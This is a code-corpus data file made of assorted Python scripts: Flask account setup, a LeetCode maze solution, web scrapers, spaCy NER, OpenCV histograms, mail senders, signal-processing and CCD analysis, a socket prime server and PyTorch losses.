\"emails/welcome.html\", firstname=firstname, username=username\n )\n with app.app_context():\n mail.send(msg)\n flash(\"Account created! Your username is: \" + username)\n return redirect(url_for(\"accounts.home\"))\n else:\n if user.account_created is True:\n flash(\"Account already verified!\")\n return redirect(url_for(\"accounts.home\"))\n else:\n return render_template(\"complete_registration.html\", form=form)\n\n\ndef createHomeDir(username):\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(\n \"storage.freeside.co.uk\", username=\"root\", password=app.config[\"IPA_PASSWORD\"]\n )\n ssh.exec_command(\"userdir.sh {}\".format(username))\n","sub_path":"app/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"235129940","text":"class Solution(object):\n def isEscapePossible(self, blocked, source, target):\n \"\"\"\n :type blocked: List[List[int]]\n :type source: List[int]\n :type target: List[int]\n :rtype: bool\n \"\"\"\n blocked_set = set()\n blocked_set.update(map(tuple, blocked))\n return self.bfs(blocked_set, source, target) and self.bfs(blocked_set, target, source)\n\n def bfs(self, blocked, origin, target):\n visited = set()\n visited.add((origin[0], origin[1]))\n queue = [(origin[0], origin[1])]\n step = 0\n while step < len(blocked):\n if not queue:\n return False\n step += 1\n next_queue = []\n for cell in queue:\n for neighbor in self.get_neighbors(cell):\n if neighbor not in visited and neighbor not in blocked:\n next_queue.append(neighbor)\n visited.add(neighbor)\n if neighbor[0] == target[0] and neighbor[1] == target[1]:\n return True\n queue = next_queue\n return True\n\n def get_neighbors(self, cell):\n return [t for t in [\n (cell[0] - 1, cell[1]),\n (cell[0] + 1, cell[1]),\n (cell[0], cell[1] - 1),\n (cell[0], cell[1] + 1),\n ] if self.is_valid(t)]\n\n def is_valid(self, t):\n return 0 <= t[0] < 1000000 and 0 <= t[1] < 1000000\n","sub_path":"src2/escape-a-large-maze/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"364852077","text":"import requests as rq\nimport numpy as np\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\n# Get Content\nurl = \"https://en.wikipedia.org/wiki/Georges_St-Pierre\"\nr = rq.get(url)\nsoup = BeautifulSoup(r.content, \"html.parser\")\n\n# Get table and record\nsection = soup.find('h2')\nrecord = soup.find('table', attrs={'class': 'wikitable sortable'})\n\nfights = list()\nfor row in record.find_all(\"tr\"):\n fighter = list()\n\n for col in row.find_all(\"td\"):\n fighter.append(col.text)\n\n fights.append(fighter)\n\n#Create data frame - Add fighter A column and swap opponent to fighter B\ncolnames = ['Res', 'Record', 'Opponent', 'Method', 'Event', 'Date', 'Round', 'Time', 'Location', 'Notes']\n\n#Initialize dataframe\ndf = pd.DataFrame(fights, columns=colnames)\n\n\n\n#Split columns and clean data\ndf[['Wins', 'Losses']] = df['Record'].str.split(\"–\", expand=True)\ndf[['WonBy', 'SubMethod']] = df['Method'].str.split(\"(\", expand=True)\ndf[['City', 'State/Province', 'Country']] = df['Location'].str.split(\",\", expand=True)\ndf = df.drop(df.index[0]) #drop empty first row\n\n#Clean up dates\ndef getDate(x):\n x = x.replace('00000000', '')\n x = x[0:10]\n x = dt.strptime(x, \"%Y-%m-%d\")\n return x\n\ndf['Date'] = df['Date'].apply(getDate)\n\n#Remove empty rows, old columns, and characters from new columns\ndf['SubMethod'] = df['SubMethod'].str.replace(')', '')\ncoldrop = ['Record', 'Method', 'Location']\ndf = df.drop(coldrop, 1)\n\n#Set index to dates of fights and add layover for each bout\ndf = df.set_index(df['Date'])\ndf['Delta'] = (df['Date'] - df['Date'].shift(-1)).fillna(0)\n\n\n\n\n\n","sub_path":"wikiscraper.py","file_name":"wikiscraper.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"182004615","text":"import re\nfrom collections import Counter\nfrom pprint import pprint\n\nimport en_core_web_sm\nimport requests\nimport spacy\nfrom bs4 import BeautifulSoup\nfrom spacy import displacy\n\nnlp = en_core_web_sm.load()\n\n\ndef url_to_string(url):\n res = requests.get(url)\n html = res.text\n soup = BeautifulSoup(html, 'html.parser')\n for script in soup([\"script\", \"style\", 'aside']):\n script.extract()\n return \" \".join(re.split(r'[\\n\\t]+', soup.get_text()))\n\n\nny_bb = url_to_string(\n 'https://en.wikipedia.org/wiki/Lysistrata'\n)\nprint(ny_bb)\narticle = nlp(ny_bb)\nprint(len(article.ents))\nlabels = [x.label_ for x in article.ents]\npprint(Counter(labels))\n\nitems = [x.text for x in article.ents]\npprint(Counter(items).most_common(3))\n\n\n# Random Sentance\nsentences = [x for x in article.sents]\nsen = sentences[100]\n\n# Highlite IOB\n# displacy.serve(nlp(str(sen)), style='ent')\n\n# Tree View\n# displacy.serve(\n# nlp(str(sen)),\n# style='dep',\n# options={'distance': 120}\n# )\n\n\na = [(x.orth_, x.pos_, x.lemma_) for x in [y\n for y\n in nlp(str(sen))\n if not y.is_stop and y.pos_ != 'PUNCT']]\n\nb = dict([(str(x), x.label_) for x in nlp(str(sentences[20])).ents])\n\nprint([(x, x.ent_iob_, x.ent_type_) for x in sentences[20]])\n\ndisplacy.serve(article, style='ent', port=4999)\n","sub_path":"name_entity_recognition/article_extraction.py","file_name":"article_extraction.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"72589624","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport pandas as pd\nulist=list()\nclass LiepinPipeline:\n def process_item(self, item, spider):\n df=pd.DataFrame(item[\"liepin_xueli\"]).rename(columns={0:\"学历\"})\n df[\"经验\"]=item[\"liepin_jingyan\"]\n df[\"薪水\"]=item[\"job_xinshui\"]\n df[\"职称\"]=item[\"job_zhicheng\"]\n df[\"公司名称\"]=item[\"job_company_name\"]\n df[\"链接\"]=item[\"job_url\"]\n df[\"公司链接\"]=item[\"job_company_url\"]\n self.addition(df)\n #df.to_excel(\"liepin_job.xlsx\")\n# df1=list()\n# df1.append(item[\"liepin_job\"],ignore_index=True)\n# print(df1) \n #print(type(item[\"liepin_job\"]))\n# df_all=pd.concat(item[\"liepin_job\"])\n# print(df_all)\n# for x in item[\"liepin_job\"]:\n \n# df=pd.DataFrame(item[\"liepin_job\"]\n \n #return df\n def addition(self,df):\n #print(df,\"不知道是不是为空喔\")\n ulist.append(df)\n #print(ulist) \n df_合并=pd.concat(ulist)\n #print(df_合并)\n df_合并.to_excel(\"猎聘网数据分析相关岗位信息.xlsx\")\n# return df_合并\n #ulist=list()\n","sub_path":"liepin/liepin/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"599168089","text":"import pytest\n\nfrom topic_05_data_structure.hw.zip_1_names import zip_names\n\nparams = [\n (None, None, 'First arg must be list!'),\n (0, (1, 2, 3), 'First arg must be list!'),\n ('0', (1, 2, 3), 'First arg must be list!'),\n\n ([], None, 'Second arg must be set!'),\n ([], 0, 'Second arg must be set!'),\n ([], '0', 'Second arg must be set!'),\n\n ([], set(), 'Empty list!'),\n ([1], set(), 'Empty set!'),\n\n (['Rose'], {'Black'}, [('Rose', 'Black')]),\n (['Rose', 'White'], {'Black'}, [('Rose', 'Black')]),\n (['Rose', 'Mark'], {'Black', 'Pink'}, [('Rose', 'Pink'), ('Mark', 'Black')]),\n]\n\nids = [\"name_list: %s | surname_set: %s => %s\" % (name_list, surname_set, expected) for\n (name_list, surname_set, expected) in params]\n\n\ndef unpack_zipped_list(zipped_list: list):\n all_items = []\n for tuple_tmp in zipped_list:\n for item in tuple_tmp:\n all_items.append(item)\n return all_items\n\n\n@pytest.mark.parametrize(argnames=\"name_list, surname_set, expected\",\n argvalues=params,\n ids=ids)\ndef test_zip_names(name_list, surname_set, expected):\n if type(expected) == str:\n assert zip_names(name_list, surname_set) == expected\n else:\n result = zip_names(name_list, surname_set)\n assert len(result) == len(expected)\n\n all_expected = unpack_zipped_list(expected)\n all_results = unpack_zipped_list(result)\n\n for exp_item in all_expected:\n assert exp_item in all_results\n","sub_path":"topic_05_data_structure/hw/tests/zip_1_names_test.py","file_name":"zip_1_names_test.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"125481221","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n#可以跟踪目标hsv色彩空间\n\ndef create_mask(image):\n mask = image[175:190, 175:195]\n cv2.imshow(\"mask\", mask)\n cv2.imwrite(\"C:/Users/yangchao/Desktop/OpenCV/picture/mask.jpg\", mask)\n\n\ndef hist2d_demo(image):\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n hist = cv2.calcHist(image, [0, 1], None, [180, 256], [0, 180, 0, 256])\n # cv2.imshow(\"hist2d\", hist)\n plt.imshow(hist, interpolation=\"nearest\")\n plt.title(\"hist2d\")\n plt.show()\n\ndef roi_hist():\n sample = cv2.imread(\"C:/Users/yangchao/Desktop/OpenCV/picture/mask.jpg\")\n target = cv2.imread(\"C:/Users/yangchao/Desktop/OpenCV/picture/1.jpg\")\n\n cv2.imshow(\"sample\", sample)\n cv2.imshow(\"target\", target)\n\n roi_hsv = cv2.cvtColor(sample, cv2.COLOR_BGR2HSV)\n target_hsv = cv2.cvtColor(target, cv2.COLOR_BGR2HSV)\n\n roiHist = cv2.calcHist([roi_hsv], [0, 1], None, [180, 256], [0,180, 0, 256])\n cv2.normalize(roiHist, roiHist, 0, 256, cv2.NORM_MINMAX)\n dst = cv2.calcBackProject([target_hsv], [0, 1], roiHist, [0, 180,0, 256], 1)\n cv2.imshow(\"roi_hist\", dst)\n\n\n\n\n\n#image = cv2.imread(\"C:/Users/yangchao/Desktop/OpenCV/picture/1.jpg\")\n#src = cv2.imread(\"C:/Users/yangchao/Desktop/OpenCV/picture/mask.jpg\")\n#cv2.imshow(\"image\", image)\n#cv2.imshow(\"mask\", src)\nroi_hist()\nc = cv2.waitKey(0)\nif c == 27:\n cv2.destroyAllWindows()\n","sub_path":"untitled1/直方图方向投影.py","file_name":"直方图方向投影.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"89287481","text":"import smtplib\nimport configparser\n\nfrom email.header import Header\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\n\n\n#class Mail(object):\nclass Mail():\n \"\"\"Email Sender Class\"\"\"\n\n def __init__(self):\n config = configparser.ConfigParser()\n config.read('config.ini')\n self.mail_host = config['SETTINGS']['mail_host']\n self.mail_port = config['SETTINGS']['mail_port']\n self.mail_user = config['SETTINGS']['mail_user']\n self.mail_password = config['SETTINGS']['mail_password']\n\n self.mail_sender = config['SETTINGS']['mail_sender']\n\n\n #self.MailSubject = ''\n #self.MailFrom = ''\n #self.MailTo = ''\n #self.MailBody = ''\n\n\n\n def contains_non_ascii_characters(self, str):\n return not all(ord(c) < 128 for c in str) \n\n def add_header(self, message, header_name, header_value):\n if self.contains_non_ascii_characters(header_value):\n h = Header(header_value, 'utf-8')\n message[header_name] = h\n else:\n message[header_name] = header_value \n return message\n\n\n def SendMail(self, mailTo, mailSubject, mailBody):\n \n try:\n\n msg = MIMEMultipart('alternative')\n msg = self.add_header(msg, 'Subject', mailSubject)\n\n #if contains_non_ascii_characters(html):\n # html_text = MIMEText(html.encode('utf-8'), 'html','utf-8')\n #else:\n # html_text = MIMEText(html, 'html') \n\n if(self.contains_non_ascii_characters(mailBody)):\n plain_text = MIMEText(mailBody.encode('utf-8'),'plain','utf-8') \n else:\n plain_text = MIMEText(mailBody,'plain')\n\n msg.attach(plain_text)\n #msg.attach(html_text)\n\n\n\n\n\n\n\n\n string ='\\r\\n'\n # Prepare actual message body\n Body = string.join((\n \"From: %s\" % self.mail_sender,\n \"To: %s\" % mailTo,\n \"Subject: %s\" % mailSubject,\n \"\",\n mailBody\n ))\n\n server = smtplib.SMTP(self.mail_host, self.mail_port) #Port for TLS/STARTTLS\n #server = smtplib.SMTP(\"smtp.gmail.com\", 465) #Port for SSL\n\n server.ehlo()\n server.starttls()\n\n\n server.login(self.mail_user, self.mail_password)\n\n\n server.sendmail(self.mail_sender, mailTo, str(msg))\n server.close()\n print ('successfully sent the mail')\n\n\n except Exception as e:\n print (\"failed to send mail.\"+str(e))\n\n","sub_path":"libs/MailSenderUnicode.py","file_name":"MailSenderUnicode.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"494818974","text":"user2 ={\n 'name':'sanskar jain',\n 'age':20,\n 'learning now':['programming','living','engg'],\n }\nd=dict.fromkeys(['name','age','height'],'unknown')\nprint(d)\nd=dict.fromkeys(\"abc\",'unknown')\nprint(d)\nprint(user2.get('name'))\nprint(user2.get('names'))\n\nd.clear()\nprint(d)\nus1=user2.copy()\nprint(us1)\nprint(us1 is user2)\nu1=user2\nprint(u1 is user2)\nprint(user2.get('name1','not found'))\nuser2 ={\n 'name':'sanskar jain',\n 'age':20,\n 'learning now':['programming','living','engg'],\n 'name':'samins'\n }\nprint(user2)\n","sub_path":"python/dict53.py","file_name":"dict53.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"81147773","text":"import win32com.client as win32\nfrom win32com.client import Dispatch\nimport os\n\n\n# This portion deals with the mail part\noutlook = win32.Dispatch('outlook.application')\n# Workaround to send the mail from a different mail id----------- skip this part if you want to send mail from your default mail box\nsendfromAC = None\nfor oacc in outlook.Session.Accounts:\n if oacc.SmtpAddress == \"karol.sawicki@example.com\": # Mail id from which to send the mail\n sendfromAC = oacc\n break\n # ----------------------------------------------------------------\n\nmail = outlook.CreateItem(0)\n\n # ----------------------------------------------------------------\nif sendfromAC:\n # Msg.SendUsingAccount = oacctouse\n mail._oleobj_.Invoke(*(64209, 0, 8, 0, sendfromAC))\n # ----------------------------------------------------------------\n \n \n \n mail.To = 'CONFIDENTIAL@example.com;'\n mail.Cc = 'CONFIDENTIAL@example.com;'\n mail.Subject = '[CONFIDENTIAL] CONFIDENTIAL'\n\n mail.HTMLBody = mail.HTMLBody + \"
Cześć, \" \\\n + \"
Noc spokojna, kolejka czysta. \"\\\n + \"
Pozdrawiam / Regards\"\\\n + \"
Karol Sawicki \"\\\n + \"
CONFIDENTIAL\"\\\n + \"
CONFIDENTIAL\"\\\n + \"
CONFIDENTIAL\"\\\n + \"
e-mail: CONFIDENTIAL\"\n \n mail.Display(False)","sub_path":"MorningMail2.py","file_name":"MorningMail2.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"369217060","text":"### 对excel数据作相关分析-统计全部数据\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nfrom scipy.spatial.distance import pdist\r\n\r\n\r\nexcel_folder = \"example\"\r\nexcels = os.listdir(excel_folder)\r\nif not os.path.exists(\"results\"):\r\n\tos.mkdir(\"results\")\r\n\r\nfor excel in tqdm(excels):\r\n\tdf = pd.read_excel(excel_folder+\"/\"+excel) # 默认第一个sheet\r\n\t# 参数定义\r\n\tnum_pairs = 0 # 一共多少对距离相关\r\n\tcompound1 = []\r\n\tcompound2 = []\r\n\tcorrelation = []\r\n\r\n\t# 计算相关系数的绝对值\r\n\tcompounds = list(df[\"Compound\"]) # 所有的物质名称\r\n\tfor index1, comp1 in enumerate(compounds): # index1:第一种物质全局标号\r\n\t\tfor index, comp2 in enumerate(compounds[index1+1:]):\r\n\t\t\tindex2 = index1 + index + 1 # 第二种物质的全���标号\r\n\t\t\tdata1 = list(df.loc[index1])[1:]\r\n\t\t\tdata2 = list(df.loc[index2])[1:]\r\n\t\t\tcorr_dis = pdist(np.vstack([data1, data2]), 'correlation') # 相关距离,结果类似array([-1.])\r\n\t\t\tcorr = abs((1 - corr_dis)[0])\r\n\r\n\t\t\t# 统计结果\r\n\t\t\tnum_pairs += 1\r\n\t\t\tif index == 0:\r\n\t\t\t\tcompound1.append(comp1)\r\n\t\t\telse:\r\n\t\t\t\tcompound1.append(\"\")\r\n\t\t\tcompound2.append(comp2)\r\n\t\t\tcorrelation.append(corr)\r\n\r\n\t# 输出数据\r\n\twriter = pd.ExcelWriter(\"results/result_\" + excel)\r\n\tdata = {\"compound1\":compound1, \"compound2\":compound2, \"correlation\":correlation}\r\n\toutput_data = pd.DataFrame(data, columns=['compound1','compound2','correlation'])\r\n\toutput_data.to_excel(writer, 'Sheet1', index=False) # 不输出行标号\r\n\twriter.save()\r\n\r\n\tprint(\"%s: 共处理%d种物质, 计算%d个相关对.\"%(excel, len(compounds), num_pairs))\r\n\r\n# 所有excel处理完毕\r\nprint(\"All done!\")\r\n","sub_path":"1.excel_data_correlation_analysis/handle.py","file_name":"handle.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"485787301","text":"import numpy as np\nimport ipcv\n\ndef idft2(F, scale=False):\n\t\"\"\"\n\tTitle:\n\t\tidft2\n\tDescription:\n\t\tPerforms an Inverse Discrete Fourier Transform on given 2D array\n\tAttributes:\n\t\tf - 2D ndarray to be transformed\n\t\tscale - if true, divide by length of signal\n\tAuthor:\n\t\tMolly Hill, mmh5847@rit.edu\n\t\"\"\"\n\t#error-checking\n\tif type(F) != np.ndarray:\n\t\traise TypeError(\"Source must be ndarray.\")\n\tif type(scale) != bool:\n\t\tscale = True\n\t\tprint(\"Scale var must be Boolean. Defaulting to True.\")\t\n\tif F.dtype != np.complex128:\n\t\tF = F.astype(np.complex128)\n\t\tprint(\"Converting signal to dtype complex128.\")\n\n\tfr = np.array([])\n\tfc = np.array([])\n\n\tfor r in np.arange(F.shape[0]): #transform one dimension\n\t\tfr = np.append(fr,ipcv.idft(F[r],scale))\n\tfr = np.reshape(fr,F.shape)\n\tfor c in np.arange(F.shape[1]): #transform other dimension\n\t\tfc = np.append(fc,ipcv.idft(fr[:,c],scale))\n\tftrans = np.reshape(fc,F.shape)\n\n\treturn ftrans\n\nif __name__ == '__main__':\n\timport numerical\n\timport numpy\n\timport time\n\n\tM = 2**5\n\tN = 2**5\n\tF = numpy.zeros((M,N), dtype=numpy.complex128)\n\tF[0,0] = 1\n\n\trepeats = 10\n\tprint('Repetitions = {0}'.format(repeats))\n\n\tstartTime = time.clock()\n\tfor repeat in range(repeats):\n\t\tf = numerical.idft2(F)\n\tstring = 'Average time per transform = {0:.8f} [s] '\n\tstring += '({1}x{2}-point iDFT2)'\n\tprint(string.format((time.clock() - startTime)/repeats, M, N))\n\n\tstartTime = time.clock()\n\tfor repeat in range(repeats):\n\t\tf = numpy.fft.ifft2(F)\n\tstring = 'Average time per transform = {0:.8f} [s] '\n\tstring += '({1}x{2}-point iFFT2)'\n\tprint(string.format((time.clock() - startTime)/repeats, M, N))\n","sub_path":"idft2.py","file_name":"idft2.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"509433797","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 12 14:11:57 2016\n\n@author: berend\n\"\"\"\n\n#CCD statistics\n\n#Functions:\n#1. func that subtracts dark field\n#2. func that finds location of peak and makes a list of positions, height and areas (for diagnostics, OK to be slow)\n# loop local max from high to low (highest local max is global max!)\n# - find local max\n# - find area in a pixel mask centered around that local max\n# - integrate intens\n# - make it zero in the mask\n# - iterate\n#3. func that replaces all those by a single pix\n#Idea to do that:\n# - remove CCD BG\n# - remove 5% max thresh\n# - iterate over maxima with pixel mask, replace peak with uniform Gaussian\n\n\n# dark field subtraction: DF can be averaged over columns and then expanded back to DF\n\n#Find peak halo info by adding up a bunch of peaks and averaging to get the halo out of the background\n#Make a library of different peaks, do statistics on their width, FWHM, height\n#Find out how many counts you actually get with a certain \"countrate\"\n#A gaussian seems to describe the peak fairly well\n\n\n\n\nimport numpy as np\nimport struct\nimport matplotlib.pyplot as plt\nimport time\nimport ImPr as impr\nimport os\n\n\n\n\n\ndef loadUBCData(path):\n with open(path, 'rb') as f:\n bytestring = f.read()\n \n size = 1376*1024\n\n data1D=np.array(struct.unpack('%sf' % size,bytestring))\n\n\n data=np.empty((1376, 1024))\n\n for ii in range(1024):\n for jj in range(1376):\n data[jj,ii] = data1D[ii*1376+jj]\n \n return data\n\n\ndef loadUBCRAW(path):\n with open(path, 'r') as f:\n datastring = f.read().split('\\n')[2:]\n \n data=np.empty((1376, 1024))\n \n \n for i in range(1024):\n data[:,i] = np.array(list(map(float,datastring[i].split('\\t'))))\n \n return data\n \n#this seems like a reasonable way to implement a BG correction, it's fairly smooth\n# if you subtract the correction image from the original data \ndef makeDFCorrection(DFdata):\n \"\"\"DFdata is a np array containing a DF image, returns averaged array over columns\"\"\"\n DFcorrection = np.array(DFdata) # create new array \n DFline = np.sum(DFdata, axis = 1)/1024.\n for i in range(1024):\n DFcorrection[:,i] = DFline\n \n return DFcorrection\n \n\n\ndef digitize(A, thresh):\n \"\"\"return 1 if A[i,j] greater then thresh*A.max(), else return 0\"\"\"\n Thresh = thresh * A.max()\n return np.where(np.greater(A, Thresh),1,0)\n\n \ndef implot(data):\n fig, ax = plt.subplots(figsize=(10,10))\n ax.imshow(data, cmap = 'afmhot', extent = [0,1024,0,1376], aspect=1)\n \n \ndef timefunc(func, *args, n = 100):\n t0 = time.time()\n for i in range(n): \n out = func(*args)\n t1 = time.time()\n print('Execution time: %s' % ((t1-t0)/n))\n \n return ((t1-t0)/n, out)\n \n \n\ndef getnbrs(i, A):\n \"\"\"return list of neighbors of i that are nonzero\"\"\"\n (x,y) = itoxy(i,A)\n nbrs = []\n if((A[x+1,y]>0) & (x0) & (x>0)):\n nbrs.append(xytoi((x-1, y),A))\n if((A[x,y+1]>0) & (y0)&(y>0)):\n nbrs.append(xytoi((x, y-1),A))\n \n return nbrs\n \ndef itoxy(i, A):\n \"\"\"go from index i to tuple (x,y)\"\"\"\n return (i%A.shape[1],int(i/A.shape[1]))\n \ndef xytoi(tup, A):\n \"\"\"go from tuple tup = (x,y) to i\"\"\"\n return tup[1]*A.shape[1]+tup[0]\n\ndef find_un(l):\n \"\"\"return list only keeping unique elements of sorted list l\"\"\"\n l.sort()\n i = 0\n while (i < (len(l)-1)):\n if(l[i] == l[i+1]):\n l.pop(i)\n else:\n i+=1\n return l\n \ndef MarkClusters(A):\n \"\"\"return array of labelled clusters\"\"\"\n #Make copy of A to set zeros\n B = 
np.array(A)\n #Make another copy to mark clusters\n C = np.array(B)\n startval = 1 #starting label\n inc = 1 #increment\n index = []\n n_obj = 0\n label = startval\n \n for i in range(B.shape[0]):\n for j in range(B.shape[1]):\n if B[i,j] == 1: #found cluster\n n_obj += 1\n index.append(xytoi((i,j),B))\n while not isempty(index):\n B[itoxy(index[0],B)] = 0 #remove point from original\n C[itoxy(index[0],B)] = label #label the connected matrix\n nbrs = getnbrs(index.pop(0), B) # get neighbors\n index += nbrs #add to index\n index = find_un(index)\n label += inc\n \n return C\n \n \n \n \ndef isempty(l):\n \"\"\"checks if a list is empty\"\"\"\n return (len(l) == 0)\n \n\ndef writepeaks(peaks, dirname):\n os.mkdir(dirname)\n \n for i in range(len(peaks)):\n name = 'peak%s' % i\n np.savetxt((dirname + '/m' + name), peaks[i])\n\ndef writepeakstats(peakdistr, outname):\n np.savetxt(outname, peakdistr)\n \n \n \n\n \ndef tempfunc(datacor, databu, DFcor):\n datacor = databu-DFcor\n \n\ndef tempfunc2(datacor, databu, DFcor, outdata):\n datacor = databu-DFcor\n im.py_find_im_regions(datacor, outdata)\n \n\nim = impr.ImPr()\nrawdata = loadUBCData('singleevents')\nrawdata2 = loadUBCData('singleevents2')\nrawdata3 = loadUBCData('singleevents3')\ndf = loadUBCRAW('darkfield.raw')\ndfcor = makeDFCorrection(df)\ndatabu = rawdata-dfcor\ndata = np.array(databu)\n#datacut = np.array(data[400:600,400:600])\npeakdistr = np.array(im.py_get_im_peak_stats(data, thresh = 10.0))\npeaks = im.get_im_peaks(data, thresh = 10.0, size = 15)\n#peakdistr_th = np.array(im.py_get_im_peak_stats(rawdata, thresh = 86.0))\ndata2 = rawdata2 - dfcor\ndata3 = rawdata3 - dfcor\n#\npeakdistr2 = np.array(im.py_get_im_peak_stats(data2, thresh = 10.0))\n##peakdistr_th2 = np.array(im.py_get_im_peak_stats(rawdata2, thresh = 86.0))\npeaks2 = im.get_im_peaks(data2, thresh = 10.0, size = 15)\n#\n#\npeakdistr3 = np.array(im.py_get_im_peak_stats(data3, thresh = 10.0))\n##peakdistr_th3 = np.array(im.py_get_im_peak_stats(rawdata3, thresh = 86.0))\npeaks3 = im.get_im_peaks(data3, thresh = 10.0, size = 15)\n\n#plt.hist(peakdistr[:,2])\n#plt.show()\n\n#peaksXY = np.array(im.py_find_im_peaks(datacut, thresh = 10.0))\n#peaksXY.T\n#fig, ax = plt.subplots(figsize=(6,6))\n#ax.imshow(data[400:600,400:600], extent = [0,200,200,0])\n#plt.plot(peaksXY.T[1], peaksXY.T[0], linestyle = 'none', marker = 'x', color = 'red')\n#\n#\n\n","sub_path":"CCDstat.py","file_name":"CCDstat.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"327210083","text":"#!/usr/bin/env python3\nimport socket\nimport pickle\nimport multiprocessing\nimport zlib\n\nHOST = ''\nPORT = 2424\n\n\ndef primos(inicio, final):\n numeros_primos = list()\n for num in range(inicio,final+1):\n if num > 1:\n for i in range(2,num):\n if(num % i == 0):\n break\n else:\n numeros_primos.append(num)\n return numeros_primos\n\n\ndef main ():\n c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n c.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n c.bind((HOST, PORT))\n c.listen(10)\n print(\"Esperando conexion en puerto %d\" % PORT)\n while True:\n current, address = c.accept()\n print(\"Conectado a %s\" % address[0])\n\n while True:\n data = current.recv(2048)\n if data == \"stop\":\n current.shutdown(1)\n current.close()\n exit()\n else:\n rango = data.split(b\",\")\n print(rango)\n inicio = int(rango[0])\n final = int(rango[1])\n\n if final > 7500:\n print(\"Procesando primos entre %d y %d\" % (inicio, final))\n list_ents = []\n for i in range(inicio,final,7500):\n list_ents.append(i)\n for i,e in enumerate(list_ents[:-1]):\n bgn = e\n end = list_ents[i+1]\n list_primes = primos(bgn,end)\n data = pickle.dumps(list_primes)\n z = zlib.compress(data)\n current.sendall(z)\n\n\n else:\n print(\"Procesando primos entre %d y %d\" % (inicio, final))\n lista = primos(inicio, final)\n data = pickle.dumps(lista)\n z = zlib.compress(data)\n current.sendall(z)\n\n\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass","sub_path":"Trabajos Python/primes multy/primes_server_multy.py","file_name":"primes_server_multy.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"574511326","text":"import torch\nimport torch.nn as nn\n\n\nclass Discrete_CELoss(nn.Module):\n def __init__(self, granularity):\n super(Discrete_CELoss, self).__init__()\n self.granularity = granularity / 10\n self.criterion = torch.nn.CrossEntropyLoss()\n\n def forward(self, x, gt):\n gt = gt * self.granularity\n int_gt = gt.type(torch.cuda.LongTensor)[0]\n return self.criterion(x, int_gt)\n\n\nclass CombinedLoss(nn.Module):\n def __init__(self, conv, writer, granularity=100):\n super(CombinedLoss, self).__init__()\n self.conv = conv\n self.granularity = granularity / 10\n self.writer = writer\n self.criterion1 = torch.nn.CrossEntropyLoss()\n self.criterion2 = torch.nn.MSELoss()\n\n def forward(self, x, gt):\n gt = gt * self.granularity\n int_gt = gt.type(torch.cuda.LongTensor)[0]\n loss1 = self.criterion1(x, int_gt)\n # int_x = torch.unsqueeze(x.max(dim=1)[1], 1).type(torch.cuda.FloatTensor)\n est_x = self.conv(x)\n loss2 = self.criterion2(est_x, gt)\n self.writer.add_scalar('train_loss/CE', loss1.item())\n self.writer.add_scalar('train_loss/MSE', loss2.item())\n return loss1 + 0.1 * loss2\n\n\nclass LogDepthLoss(nn.Module):\n def __init__(self):\n super(LogDepthLoss, self).__init__()\n\n def forward(self, x, gt):\n N = x.size(2) * x.size(3)\n d = x.log() - gt.log()\n ddx = torch.zeros(x.size()).cuda()\n ddy = torch.zeros(x.size()).cuda()\n ddx[:,:,:-1,:] = d[:,:,1:,:] - d[:,:,:-1,:]\n ddy[:,:,:,:-1] = d[:,:,:,1:] - d[:,:,:,:-1]\n loss = 1/N**2 * torch.sum(d**2, dim=(2, 3)) - 1/(2*N**2) * d.sum(dim=(2,3))**2 + 1/N * (ddx**2 + ddy**2).sum(dim=(2,3))\n return loss.mean()\n","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
